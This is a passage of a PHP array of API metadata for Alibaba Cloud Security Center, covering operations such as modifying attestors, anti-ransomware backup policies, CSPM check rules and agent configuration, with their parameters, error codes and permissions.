200,\\n \\"RequestId\\": \\"23C85959-1540-514B-93CF-2992C53A1B4F\\",\\n \\"ErrCode\\": \\"ServerError\\",\\n \\"Success\\": true,\\n \\"ErrMessage\\": \\"ServerError\\"\\n}","type":"json"}]', ], 'ModifyAttestor' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92349', 'abilityTreeNodes' => ['FEATUREsasJEFOWE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'example' => '1.2.XX.XX', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the witness.'."\n", 'example' => 'attestor-auto-ad5316', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'KeyRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the Key Management Service (KMS) key.'."\n", 'example' => 'cn-hangzhou', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'KeyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the KMS key.'."\n", 'example' => 'key-********', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'KeyVersionId', 'in' => 'query', 'schema' => ['description' => 'The version ID of the KMS key.'."\n", 'example' => 'key-****', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The description.'."\n", 'example' => 'remark', 'required' => false, 'type' => 'string', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'example' => '9E8B1D8F-DE1C-5421-81AA-**********', 'type' => 'string', 'title' => ''], ], 'type' => 'object', 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyAttestor', 'summary' => 'Modifies the information about a witness that is created by using the container signature feature.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAttestor'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyAttestor', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9E8B1D8F-DE1C-5421-81AA-**********\\"\\n}","type":"json"}]', ], 'ModifyAutoDelConfig' => [ 'summary' => 'Sets the automatic deletion time for expired vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92350', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Days', 'in' => 'query', 'schema' => ['description' => 'The automatic deletion time for expired vulnerabilities. Valid values:'."\n" ."\n" .'- 7'."\n" .'- 30'."\n" .'- 90'."\n" ."\n" .'Unit: days.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '30', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '3BFA659D-F44F-5703-8FD1-33AB596BEACA', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Set automatic deletion time for expired vulnerabilities', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAutoDelConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyAutoDelConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3BFA659D-F44F-5703-8FD1-33AB596BEACA\\"\\n}","type":"json"}]', ], 'ModifyBackupPolicy' => [ 'summary' => 'Modifies an anti-ransomware mitigation policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware mitigation policy to modify.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '11', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the anti-ransomware mitigation policy to modify.', 'type' => 'string', 'required' => true, 'example' => 'policy_name_A', 'title' => ''], ], [ 'name' => 'Policy', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The content of the mitigation policy to modify. The value is a JSON-format string that contains the following fields:'."\n" ."\n" .'- **Source**: The server folder to protect. To protect all folders, set this field to \\[].'."\n" .'- **Include**: The file types to protect. Examples: "\\*.jpg" and "\\*.doc".'."\n" .'- **Exclude**: The custom folders to exclude. For example, exclude the folder "/home/user". Invoke the DescribeExcludeSystemPath operation to obtain all folders, and then add the folders that you want to exclude.'."\n" .'- **Schedule**: The start time and interval of the data backup task. Specify a non-hourly time during off-peak hours.'."\n" ."\n" .' - Example 1: I|1583216092|P21D indicates that the start time is 2020-03-03 14:14:52 and the interval is 3 weeks.'."\n" ."\n" .' - Example 2: I|1583216092|PT24H indicates that the start time is 2020-03-03 14:14:52 and the interval is 24 hours.'."\n" ."\n" .'- **Retention**: The retention period of backup data. Unit: days. 7 indicates 1 week, 365 indicates 1 year, and -1 indicates permanent retention.'."\n" .'- **SpeedLimiter**: The network bandwidth throttling for backup. Example: 12:15:15360|6:12:5120 indicates 15 MB from 12:00 to 15:00 and 5 MB from 6:00 to 12:00.'."\n" .'Cloud-hosted servers connect through the internal network. Do not limit the backup network bandwidth. To remove the bandwidth limit, set this parameter to an empty string ("").', 'type' => 'object', 'required' => true, 'example' => '{"Source":["home","admin"]}', 'title' => ''], ], [ 'name' => 'PolicyVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the mitigation policy. You can invoke the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to query the version.'."\n" ."\n" .'- **1.0.0**'."\n" .'- **2.0.0**', 'type' => 'string', 'required' => false, 'example' => '2.0.0', 'title' => ''], ], [ 'name' => 'PolicyRegionId', 'in' => 'query', 'schema' => ['description' => 'The region of the server for which you want to modify the mitigation policy.'."\n" ."\n" .'You can invoke the [DescribeSupportRegion](~~DescribeSupportRegion~~) operation to query the regions supported by the anti-ransomware feature.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers protected by the mitigation policy.', 'type' => 'array', 'items' => ['description' => 'The UUID of a server protected by the mitigation policy.', 'type' => 'string', 'required' => false, 'example' => '3bb30859-b3b5-4f28-868f-b0892c98****', 'title' => ''], 'required' => true, 'example' => '["3bb30859-b3b5-4f28-868f-b0892c98****", "3bb30859-b3b5-4f28-868f-b0892c98****"]', 'maxItems' => 1000, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA04B21', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AgentNotOnline', 'errorMessage' => 'The agent not online.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify an anti-ransomware policy', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyBackupPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyBackupPolicy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BackupPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:backuppolicy/{#BackupPolicyId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D0D6E6E4-CB8C-4897-B852-46AEFDA04B21\\"\\n}","type":"json"}]', ], 'ModifyBackupPolicyStatus' => [ 'summary' => 'Enables or shuts down an anti-ransomware policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware policy that you want to enable or shutdown.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '30490', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable or disable the anti-ransomware policy. Valid values:'."\n" ."\n" .'- **enabled**: Enables the anti-ransomware policy. After the policy is enabled, anti-ransomware can protect your server data by backing up data on specified servers based on your anti-ransomware policy.'."\n" .'- **disabled**: Disables the anti-ransomware policy. After the policy is disabled, running backup tasks are stopped.'."\n" ."\n" .'> Backup tasks consume network bandwidth. Enable the policy during off-peak hours to execute data backup tasks.', 'type' => 'string', 'required' => true, 'example' => 'enabled', 'title' => ''], ], [ 'name' => 'PolicyVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the policy that you want to enable or disable. Set the value to **2.0.0**.', 'type' => 'string', 'deprecated' => true, 'required' => false, 'example' => '2.0.0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters for modifying the anti-ransomware policy.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'E342452B-4401-5F74-9A1B-D24479851173', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AntiRansomwareCapacityUseUp', 'errorMessage' => 'anti ransomware capacity use up', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Enable or shutdown an anti-ransomware policy', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyBackupPolicyStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyBackupPolicyStatus', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BackupPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:backuppolicy/{#BackupPolicyId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E342452B-4401-5F74-9A1B-D24479851173\\"\\n}","type":"json"}]', ], 'ModifyBinarySecurityPolicy' => [ 'summary' => 'Modifies a container image signing security policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92353', 'abilityTreeNodes' => ['FEATUREsasJEFOWE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '115.213.XX.XX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The policy name.', 'type' => 'string', 'required' => false, 'example' => 'test-policy-04-11', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks.', 'type' => 'string', 'required' => false, 'example' => 'Remark', 'title' => ''], ], [ 'name' => 'Policy', 'in' => 'query', 'schema' => ['description' => 'The policy content in JSON format. Valid keys:'."\n" .'- **policyMode**: The policy type. Default value: requireAttestor.'."\n" .'- **requiredAttestors**: The required attestors.', 'type' => 'string', 'required' => true, 'example' => '{\\"PolicyMode\\":\\"requireAttestor\\",\\"RequiredAttestors\\":[\\"test-xcs-04-11-****\\"]}', 'title' => ''], ], [ 'name' => 'Clusters', 'in' => 'query', 'schema' => ['description' => 'The cluster information.', 'type' => 'string', 'required' => true, 'example' => '[{\\"Namespaces\\":[\\"default\\"],\\"ClusterId\\":\\"c9f5b93a8da8f4341b77***********\\"},{\\"Namespaces\\":[\\"default\\"],\\"ClusterId\\":\\"cc12429dbb8f644f690b0***********\\"}]', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'Settings to enable or disable the policy. Valid values:'."\n" ."\n" .'- **enabled**: Enables the mitigation policies.'."\n" .'- **disabled**: Disables the mitigation policies.', 'enumValueTitles' => ['disabled' => 'Disable.', 'enabled' => 'Enable.'], 'type' => 'string', 'required' => false, 'example' => 'enabled', 'title' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'C699E4E4-F2F4-58FC-A949-457FFE59****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify container image signing security policy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyBinarySecurityPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyBinarySecurityPolicy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C699E4E4-F2F4-58FC-A949-457FFE59****\\"\\n}","type":"json"}]', ], 'ModifyCheckRule' => [ 'summary' => 'Modifies the rule settings of Cloud Security Posture Management (CSPM).', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '230334', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n" .'> You can call the [ListCheckRule](~~2590599~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '9000**', 'title' => ''], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The rule type. Default value: **WHITE**. Valid values:'."\n" .'- **WHITE**: whitelist.', 'type' => 'string', 'required' => false, 'example' => 'WHITE', 'title' => ''], ], [ 'name' => 'AddInstanceList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of instances to add in this rule update. If no instances need to be added, you do not need to specify this parameter.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region ID of the asset.', 'type' => 'string', 'required' => false, 'example' => 'cn-shanghai', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'required' => false, 'example' => 'i-wz9g8ljygfqs1ez3****', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'DeleteInstanceList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of instances to delete in this rule update. If no instances need to be deleted, you do not need to specify this parameter.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region ID of the asset.', 'type' => 'string', 'required' => false, 'example' => 'cn-shanghai', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'required' => false, 'example' => 'i-8vb0e8qdaj0yyxjo****', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks.', 'type' => 'string', 'required' => false, 'example' => 'testRemark', 'title' => ''], ], [ 'name' => 'ScopeType', 'in' => 'query', 'schema' => ['description' => 'The scope of the rule. Valid values:'."\n" .'- **INSTNACE**: instance'."\n" .'- **ITEM**: check item.', 'type' => 'string', 'required' => false, 'example' => 'INSTANCE', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CD380235-A0B8-540D-A0D5-D6288446****'], 'RuleId' => ['description' => 'The rule ID.', 'type' => 'string', 'example' => '123', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Modify CSPM check rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyCheckRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CD380235-A0B8-540D-A0D5-D6288446****\\",\\n \\"RuleId\\": \\"123\\"\\n}","type":"json"}]', ], 'ModifyClearLogstoreStorage' => [ 'summary' => 'Clears the storage capacity space for log analysis.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '117639', 'abilityTreeNodes' => ['FEATUREsasRXJ9SY'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The identifier of the request source. Set the value to **sas**.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'UserProject', 'in' => 'query', 'schema' => ['description' => 'The user project.', 'type' => 'string', 'required' => false, 'example' => 'sas-log-1234(uid)-cn-hangzhou', 'title' => ''], ], [ 'name' => 'UserLogStore', 'in' => 'query', 'schema' => ['description' => 'The name of the user LogStore.', 'type' => 'string', 'required' => false, 'example' => 'sas_sls_storage', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is a unique identifier generated by Alibaba Cloud for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'DC84C453-8561-5EC4-B0E9-44E67ACCB5B5', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Clear security center logs', 'description' => 'Cleared logs cannot be recovered. Before calling this operation, perform a log export and save the logs to a local device, and then call this operation to clear the logs and free up storage capacity space.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClearLogstoreStorage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyClearLogstoreStorage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"DC84C453-8561-5EC4-B0E9-44E67ACCB5B5\\"\\n}","type":"json"}]', ], 'ModifyClientConfSetup' => [ 'summary' => 'Modifies the resource configurations of the Security Center agent.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92354', 'abilityTreeNodes' => ['FEATUREsasFVYNUW'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'StrategyTag', 'in' => 'query', 'schema' => ['description' => 'The type of the tag.'."\n", 'type' => 'string', 'required' => true, 'example' => 'machineResource', 'title' => ''], ], [ 'name' => 'StrategyTagValue', 'in' => 'query', 'schema' => [ 'description' => 'The value of the tag. Valid values:'."\n" ."\n" .'* major'."\n" .'* advanced'."\n" .'* basic'."\n", 'type' => 'string', 'required' => true, 'enumValueTitles' => [], 'example' => 'major', 'title' => '', ], ], [ 'name' => 'StrategyConfig', 'in' => 'query', 'schema' => ['description' => 'The configurations of the Security Center agent.'."\n" ."\n" .'* cpu: the maximum CPU utilization that can be occupied by the Security Center agent on the server'."\n" .'* mem: the maximum memory usage that can be occupied by the Security Center agent on the server'."\n", 'type' => 'string', 'required' => false, 'example' => '{'."\n" .' "cpu": "20"'."\n" .'}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '60E24426-B910-5D7F-8B8B-3BCDC3FC****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyClientConfSetup', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClientConfSetup'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyClientConfSetup', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"60E24426-B910-5D7F-8B8B-3BCDC3FC****\\"\\n}","type":"json"}]', ], 'ModifyClientConfStrategy' => [ 'summary' => 'Modifies an agent configuration policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92355', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server that you want to query.'."\n", 'type' => 'string', 'required' => false, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], ], [ 'name' => 'Tag', 'in' => 'query', 'schema' => ['description' => 'The key of the tag that is added to the agent configuration policy.'."\n", 'type' => 'string', 'required' => true, 'example' => 'machineResource', 'title' => ''], ], [ 'name' => 'TagValue', 'in' => 'query', 'schema' => [ 'description' => 'The value of the tag that is added to the agent configuration policy.'."\n" ."\n" .'* major'."\n" .'* advanced'."\n" .'* basic'."\n", 'type' => 'string', 'required' => true, 'enumValueTitles' => [], 'example' => 'advanced', 'title' => '', ], ], [ 'name' => 'TagExt', 'in' => 'query', 'schema' => ['description' => 'The extended tag of the agent configuration policy.'."\n", 'type' => 'string', 'required' => false, 'example' => 'auto', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUID of the asset. You can specify a maximum of 500 UUIDs at a time.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '07a1300d-2198-4d0d-b1b3-c8da205e****', 'title' => ''], 'required' => false, 'maxItems' => 500, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '9089D0AB-835F-5663-AB5E-4FF646BB****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9089D0AB-835F-5663-AB5E-4FF646BB****\\"\\n}","type":"json"}]', 'title' => 'ModifyClientConfStrategy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClientConfStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyClientConfStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ModifyClientUserDefineRule' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the custom rule.'."\n" ."\n" .'>Call the [ListClientUserDefineRules](~~ListClientUserDefineRules~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '210****', 'title' => ''], ], [ 'name' => 'Md5List', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The list of process hashes.', 'type' => 'string', 'required' => false, 'example' => 'aa5ee3ed4363c9d195a591a70281****,3e522d6f3bf5cf88bb77e9ff3d13****', 'title' => ''], ], [ 'name' => 'ActionType', 'in' => 'query', 'schema' => 